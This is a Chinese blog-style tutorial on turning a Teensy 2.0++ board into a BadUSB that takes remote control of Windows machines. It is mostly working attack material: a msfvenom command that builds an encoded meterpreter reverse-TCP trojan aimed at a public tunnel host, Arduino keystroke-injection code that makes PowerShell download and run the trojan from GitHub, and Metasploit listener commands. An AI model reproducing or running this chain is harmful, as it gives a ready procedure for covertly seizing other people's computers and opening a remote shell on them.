渗透利器-BadUSB 控制外网主机详解 Teensy2.0++
准备工作
- 一块 Teensy2.0++ 的板子(淘宝一搜就有)
- Arduino编译器
- 1.8.7版本下载连接:arduino下载地址
- Teensy插件
- 下载连接:Teensy下载地址
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ryJkNHH9-1580900714737)(http://da1sy.github.io/assets/images/9-Yue/teensy-1.jpg)]
1.下载好arduino后直接解压
⚡ /home/da1sy/arduino-1.8.7# ./arduino
2.安装Teensy插件
⚡ /home/da1sy/arduino-1.8.7# ./TeensyduinoInstall.linux64
注意将插件安装到arduino的解压目录下
3.arduino修改配置
打开软件后将 工具 下配置修改如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qt73hPFf-1580900714743)(http://da1sy.github.io/assets/images/9-Yue/teensy-2.jpg)]
4.利用ngrok实现内网穿透
在https://www.ngrok.cc/ 注册账号后开通tcp隧道
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p0rQ6pAB-1580900714746)(http://da1sy.github.io/assets/images/9-Yue/teensy-3.png)]
下载客户端
⚡/home/da1sy/桌面/linux_amd64# ./sunny clientid 隧道ID号
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-260TmEzU-1580900714747)(http://da1sy.github.io/assets/images/9-Yue/teensy-4.png)]
5.利用msfvenom生成windows端木马
⚡/home/da1sy# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=free.idcfengye.com lport=17839 -f exe > windows.exe
lhost 为运行sunny后的域名,lport为开通隧道时填写的端口(运行后也会有显示)
最后将生成的木马放到github项目上实现远程下载
6.编辑arduino代码
char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://raw.githubusercontent.com/da1sy/da1sy/master/windows.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file); ";
char *command2 = "%HOMEPATH%\\windows.exe ";
//将连接的地址改为自己github的地址
void setup() {
delay(5000);
omg(command1);
delay(15000);
omg(command2);
}
void loop() {}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.println(SomeCommand);
}
编辑好后点验证,然后插入Teensy板子,最后按一下板子上的按钮完成上传
7.metasploit开启监听
⚡ /home/da1sy/# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 127.0.0.1
msf exploit(multi/handler) > set lport 6666 //ngrok开通隧道时填写的本地地址与端口号
msf exploit(multi/handler) > exploit
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NvFrtRgA-1580900714750)(http://da1sy.github.io/assets/images/9-Yue/teensy-5.png)]
8.最后对目标插入badusb
效果图如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gMBGeM7J-1580900714752)(http://da1sy.github.io/assets/images/9-Yue/teensy-s1.gif)]
监听端
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PVLFqHTr-1580900714759)(http://da1sy.github.io/assets/images/9-Yue/teensy-s2.gif)]
最后反弹的会话好像是出现了毛病,不过总体上嘛 问题不大
一些其他的代码
有时间再补
最新文章
- go channel
- 设计模式 之 命令(Command)模式
- Android Dex文件格式(二)
- IEEE802.15.4 部分无线收发芯片比较
- Linux在目录中查找某个函数
- yjfk 意见反馈
- 【Thread】多线程的异常处理?
- 关于Hadoop之父Doug Cutting
- Ubuntu Linux启用root用户登录
- 安装和使用screen
- java编程思想-并发思维导图
- Hive 5、Hive 的数据类型 和 DDL Data Definition Language)
- OpenCV功能界面和示例
- SVN分支的创建,合并,与销毁和相关操作
- Oracle清除数据库中长时间占用资源的非活动的会话
- Spring:Bean生命周期
- JavaScript、ES5和ES6的介绍和区别
- 使用第三方插件Gear Tacks 画齿轮
- ubuntu安装ftp server服务
- 26个精选的JavaScript面试问题
热门文章
- scala快排
- shell 命令综合实战
- windows支持apache、mysql、php集成环境推荐wampserver3.2 64位版本
- UML-交互图包含哪些图?
- 题解 P6004 【[USACO20JAN]Wormhole Sort S】
- Maven--归类依赖
- Java远程调用Linux脚本
- 关于Ueditor富文本编辑器的配置和使用心得
- org.apache.ibatis.binding.BindingException: Invalid bound statement (not found)报错
- Python常见经典